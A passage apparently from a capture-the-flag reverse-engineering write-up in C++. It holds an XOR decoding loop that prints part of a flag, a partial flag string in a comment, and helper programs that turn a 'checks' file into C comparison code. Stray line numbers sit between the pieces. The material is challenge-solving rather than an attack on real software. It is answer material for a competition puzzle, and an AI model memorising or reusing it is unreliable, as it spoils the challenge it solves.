    v12[31] = 124;
    v12[32] = 18;
    v12[33] = 90;
    v12[34] = 115;
    v12[35] = 109;
    v12[36] = 27;
    v12[37] = 18;
    v12[38] = 77;
    v12[39] = 66;
    v12[40] = 45;
    v12[41] = 21;
    v12[42] = 33;
    v12[43] = 37;
    v12[44] = 45;
    v12[45] = 18;
    v12[46] = 23;
    v12[47] = 25;
    v12[48] = 34;
    v12[49] = 103;
    int a[5] = {38 , 32 , 44 , 26 , 26};
    for (int i = 0; i < 5; i++)
    {
        a[i] ^=v12[45+i];
        cout<<(char)a[i];
    }

    return 0;
}
// shaktictf{3f9ct

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#include<bits/stdc++.h>

using namespace std;

int main(){
    int i=0;
    freopen("checks","r",stdin);
    string s1,s2,s3;
    while(cin>>s1){
        cin>>s2>>s3;
        cout<<"if(v13_5["<<i<<"]!="<<s3[0]<<s3[1]<<s3[2]<<s3[3]<<s3[4]<<s3[5]<<"){"<<"continue;}\n";
        i++;
    }
    return 0;
}
// #include<bits/stdc++.h>

// using namespace std;

// int main(){
//     freopen("checks","r",stdin);
//     string s1,s2,s3;
//     while(cin>>s1){
//         cin>>s2>>s3;
//         cout<<"int "<<s1+s2+s3<<endl;
//     }
//     return 0;
// }
// #include<bits/stdc++.h>

// using namespace std;

// int main(){
//     int i=0;
//     freopen("checks","r",stdin);
//     string s1,s2,s3;
//     while(cin>>s1){
//         cin>>s2>>s3;
//         cout<<"v13["<<i<<"]="<<s3<<endl;
//         i++;
//     }
//     return 0;
// }